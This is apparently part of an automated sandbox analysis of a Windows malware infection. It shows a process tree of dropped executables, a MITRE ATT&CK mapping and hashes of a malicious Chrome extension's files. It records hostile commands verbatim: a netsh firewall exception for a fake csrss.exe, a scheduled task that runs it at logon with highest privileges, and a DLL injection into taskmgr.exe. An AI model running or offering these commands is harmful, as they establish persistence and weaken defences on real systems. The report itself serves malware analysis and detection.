    - Program crash
    PID:2960
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 764
    3⤵
    - Program crash
    PID:1692
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 720
    3⤵
    - Program crash
    PID:2092
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 964
    3⤵
    - Program crash
    PID:1564
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 772
    3⤵
    - Program crash
    PID:1800
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 888
    3⤵
    - Program crash
    PID:3272
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 768
    3⤵
    - Program crash
    PID:1544
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 968
    3⤵
    - Program crash
    PID:1932
- - C:\Users\Admin\AppData\Local\Temp\Info.exe
    "C:\Users\Admin\AppData\Local\Temp\Info.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Checks for VirtualBox DLLs, possible anti-VM trick
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5140
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 192
      4⤵
      Program crash
      PID:5296
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 336
      4⤵
      Program crash
      PID:5352
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 336
      4⤵
      Program crash
      PID:5396
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 628
      4⤵
      Program crash
      PID:5444
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 628
      4⤵
      Program crash
      PID:5496
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 628
      4⤵
      Program crash
      PID:5528
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 628
      4⤵
      Program crash
      PID:5572
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 708
      4⤵
      Program crash
      PID:5648
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 728
      4⤵
      Program crash
      PID:5796
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 724
      4⤵
      Program crash
      PID:5844
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 672
      4⤵
      Program crash
      PID:5940
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 932
      4⤵
      Program crash
      PID:5976
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 564
      4⤵
      Program crash
      PID:6008
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 912
      4⤵
      Program crash
      PID:6044
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 744
      4⤵
      Program crash
      PID:5316
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 1396
      4⤵
      Program crash
      PID:4672
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 1428
      4⤵
      Program crash
      PID:5520
  - - C:\Windows\system32\cmd.exe
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      4⤵
      PID:5540
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:5652
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 1436
      4⤵
      Program crash
      PID:5588
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 1436
      4⤵
      Program crash
      PID:5788
  - - C:\Windows\rss\csrss.exe
      C:\Windows\rss\csrss.exe /94-94
      4⤵
      Executes dropped EXE
      Manipulates WinMonFS driver.
      Modifies data under HKEY_USERS
      PID:6044
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 368
        5⤵
        Program crash
        
        PID:5336
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 372
        5⤵
        Program crash
        
        PID:3648
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 372
        5⤵
        Program crash
        
        PID:5512
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 612
        5⤵
        Program crash
        
        PID:5644
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 696
        5⤵
        Program crash
        
        PID:5832
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 696
        5⤵
        Program crash
        
        PID:5768
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 696
        5⤵
        Program crash
        
        PID:5536
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 724
        5⤵
        Program crash
        
        PID:5528
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 752
        5⤵
        Program crash
        
        PID:5384
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 784
        5⤵
        Program crash
        
        PID:6028
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 852
        5⤵
        Program crash
        
        PID:2824
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 916
        5⤵
        Program crash
        
        PID:3056
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 916
        5⤵
        Program crash
        
        PID:8
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 980
        5⤵
        Program crash
        
        PID:5568
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 980
        5⤵
        Program crash
        
        PID:5148
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:5556
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 1460
        5⤵
        Program crash
        
        PID:6292
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 1508
        5⤵
        Program crash
        
        PID:6364
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 1524
        5⤵
        Program crash
        
        PID:6400
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 1544
        5⤵
        Program crash
        
        PID:3156
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 1016
        5⤵
        Program crash
        
        PID:6736
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 1584
        5⤵
        Program crash
        
        PID:6460
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 1460
        5⤵
        
        PID:6512
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 1588
        5⤵
        
        PID:6936
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 1628
        5⤵
        
        PID:6828
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 1508
        5⤵
        
        PID:4520
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 1028
        5⤵
        
        PID:7008
    - - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        5⤵
        Executes dropped EXE
        
        PID:7068
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 1560
        5⤵
        
        PID:1272
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 1632
        5⤵
        
        PID:3736
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 1636
        5⤵
        
        PID:5392
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 1484
        5⤵
        
        PID:5436
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 820
        5⤵
        
        PID:6316
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 1360
      4⤵
      Program crash
      PID:4080
- C:\Users\Admin\AppData\Local\Temp\Installation.exe
  "C:\Users\Admin\AppData\Local\Temp\Installation.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4388
- C:\Users\Admin\AppData\Local\Temp\pub2.exe
  "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:964
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 368
    3⤵
    - Program crash
    PID:5760
- C:\Users\Admin\AppData\Local\Temp\mysetold.exe
  "C:\Users\Admin\AppData\Local\Temp\mysetold.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4812
- C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
  "C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
  2⤵
  - Executes dropped EXE
  - Checks whether UAC is enabled
  PID:4556
- C:\Users\Admin\AppData\Local\Temp\Complete.exe
  "C:\Users\Admin\AppData\Local\Temp\Complete.exe"
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2824 -ip 2824
1⤵
PID:2092

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2824 -ip 2824
1⤵
PID:4084

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2824 -ip 2824
1⤵
PID:1972

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:4008
- C:\Windows\SysWOW64\rundll32.exe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  2⤵
  - Loads dropped DLL
  PID:2228
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 600
    3⤵
    - Program crash
    PID:3280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2824 -ip 2824
1⤵
PID:3792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2228 -ip 2228
1⤵
PID:832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2824 -ip 2824
1⤵
PID:2268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2824 -ip 2824
1⤵
PID:3284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2824 -ip 2824
1⤵
PID:1220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2824 -ip 2824
1⤵
PID:2660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2824 -ip 2824
1⤵
PID:1800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2824 -ip 2824
1⤵
PID:3592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2824 -ip 2824
1⤵
PID:3080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2824 -ip 2824
1⤵
PID:3096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2824 -ip 2824
1⤵
PID:3760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2824 -ip 2824
1⤵
PID:1656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2824 -ip 2824
1⤵
PID:4008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2824 -ip 2824
1⤵
PID:3096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2824 -ip 2824
1⤵
PID:4972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2824 -ip 2824
1⤵
PID:624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2824 -ip 2824
1⤵
PID:2660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2824 -ip 2824
1⤵
PID:4988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2824 -ip 2824
1⤵
PID:1800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5140 -ip 5140
1⤵
PID:5264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5140 -ip 5140
1⤵
PID:5332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5140 -ip 5140
1⤵
PID:5368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5140 -ip 5140
1⤵
PID:5420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5140 -ip 5140
1⤵
PID:5480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5140 -ip 5140
1⤵
PID:5512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5140 -ip 5140
1⤵
PID:5552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5140 -ip 5140
1⤵
PID:5620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 964 -ip 964
1⤵
PID:5716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5140 -ip 5140
1⤵
PID:5776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5140 -ip 5140
1⤵
PID:5816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5140 -ip 5140
1⤵
PID:5924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5140 -ip 5140
1⤵
PID:5960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5140 -ip 5140
1⤵
PID:5992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5140 -ip 5140
1⤵
PID:6028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5140 -ip 5140
1⤵
PID:5336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:5172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5140 -ip 5140
1⤵
PID:5468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5140 -ip 5140
1⤵
PID:5500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5140 -ip 5140
1⤵
PID:5564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5140 -ip 5140
1⤵
PID:5716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5140 -ip 5140
1⤵
PID:6116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 6044 -ip 6044
1⤵
PID:6120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 6044 -ip 6044
1⤵
PID:5316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6044 -ip 6044
1⤵
PID:4044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6044 -ip 6044
1⤵
PID:5600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6044 -ip 6044
1⤵
PID:5800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6044 -ip 6044
1⤵
PID:5876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6044 -ip 6044
1⤵
PID:5712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 6044 -ip 6044
1⤵
PID:5540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 6044 -ip 6044
1⤵
PID:6068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6044 -ip 6044
1⤵
PID:6140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 6044 -ip 6044
1⤵
PID:3056

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:5596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 6044 -ip 6044
1⤵
PID:6076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6044 -ip 6044
1⤵
PID:6136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 6044 -ip 6044
1⤵
PID:5160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 6044 -ip 6044
1⤵
PID:5256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6044 -ip 6044
1⤵
PID:6152

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:6236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 6044 -ip 6044
1⤵
PID:6328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 6044 -ip 6044
1⤵
PID:6384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 6044 -ip 6044
1⤵
PID:3396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 6044 -ip 6044
1⤵
PID:4568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 6044 -ip 6044
1⤵
PID:6884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6044 -ip 6044
1⤵
PID:6492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6044 -ip 6044
1⤵
PID:6604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6044 -ip 6044
1⤵
PID:6944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 6044 -ip 6044
1⤵
PID:5864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6044 -ip 6044
1⤵
PID:6996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 6044 -ip 6044
1⤵
PID:7032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 6044 -ip 6044
1⤵
PID:6296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 6044 -ip 6044
1⤵
PID:6324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 6044 -ip 6044
1⤵
PID:7036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 6044 -ip 6044
1⤵
PID:3984

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\background.html

Filesize
786B

MD5
9ffe618d587a0685d80e9f8bb7d89d39

SHA1
8e9cae42c911027aafae56f9b1a16eb8dd7a739c

SHA256
a1064146f622fe68b94cd65a0e8f273b583449fbacfd6fd75fec1eaaf2ec8d6e

SHA512
a4e1f53d1e3bf0ff6893f188a510c6b3da37b99b52ddd560d4c90226cb14de6c9e311ee0a93192b1a26db2d76382eb2350dc30ab9db7cbd9ca0a80a507ea1a12

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\icon.png

Filesize
6KB

MD5
c8d8c174df68910527edabe6b5278f06

SHA1
8ac53b3605fea693b59027b9b471202d150f266f

SHA256
9434dd7008059a60d6d5ced8c8a63ab5cae407e7152da98ca4dda408510f08f5

SHA512
d439e5124399d1901934319535b7156c0ca8d76b5aa4ddf1dd0b598d43582f6d23c16f96be74d3cd5fe764396da55ca51811d08695f356f12f7a8a71bcc7e45c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\aes.js

Filesize
13KB

MD5
4ff108e4584780dce15d610c142c3e62

SHA1
77e4519962e2f6a9fc93342137dbb31c33b76b04

SHA256
fc7e184beeda61bf6427938a84560f52348976bb55e807b224eb53930e97ef6a

SHA512
d6eee0fc02205a3422c16ad120cad8d871563d8fcd4bde924654eac5a37026726328f9a47240cf89ed6c9e93ba5f89c833e84e65eee7db2b4d7d1b4240deaef2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\content.js

Filesize
14KB

MD5
dd274022b4205b0da19d427b9ac176bf

SHA1
91ee7c40b55a1525438c2b1abe166d3cb862e5cb

SHA256
41e129bb90c2ac61da7dac92a908559448c6448ba698a450b6e7add9493739c6

SHA512
8ee074da689a7d90eca3c8242f7d16b0390b8c9b133d7bbdef77f8bf7f9a912e2d60b4a16f1c934f1bd38b380d6536c23b3a2f9939e31a8ef9f9c539573387b4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\jquery-3.3.1.min.js

Filesize
84KB

MD5
a09e13ee94d51c524b7e2a728c7d4039

SHA1
0dc32db4aa9c5f03f3b38c47d883dbd4fed13aae

SHA256
160a426ff2894252cd7cebbdd6d6b7da8fcd319c65b70468f10b6690c45d02ef

SHA512
f8da8f95b6ed33542a88af19028e18ae3d9ce25350a06bfc3fbf433ed2b38fefa5e639cddfdac703fc6caa7f3313d974b92a3168276b3a016ceb28f27db0714a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\mode-ecb.js

Filesize
604B

MD5
23231681d1c6f85fa32e725d6d63b19b

SHA1
f69315530b49ac743b0e012652a3a5efaed94f17

SHA256
03164b1ac43853fecdbf988ce900016fb174cf65b03e41c0a9a7bf3a95e8c26a

SHA512
36860113871707a08401f29ab2828545932e57a4ae99e727d8ca2a9f85518d3db3a4e5e4d46ac2b6ba09494fa9727c033d77c36c4bdc376ae048541222724bc2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\pad-nopadding.js

Filesize
268B

MD5
0f26002ee3b4b4440e5949a969ea7503

SHA1
31fc518828fe4894e8077ec5686dce7b1ed281d7

SHA256
282308ebc3702c44129438f8299839ca4d392a0a09fdf0737f08ef1e4aff937d

SHA512
4290a1aee5601fcbf1eb2beec9b4924c30cd218e94ae099b87ba72c9a4fa077e39d218fc723b8465d259028a6961cc07c0cd6896aa2f67e83f833ca023a80b11

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\manifest.json

Filesize
1KB

MD5
f0b8f439874eade31b42dad090126c3e

SHA1
9011bca518eeeba3ef292c257ff4b65cba20f8ce

SHA256
20d39e65b119ed47afd5942d2a67e5057e34e2aef144569796a19825fea4348e

SHA512
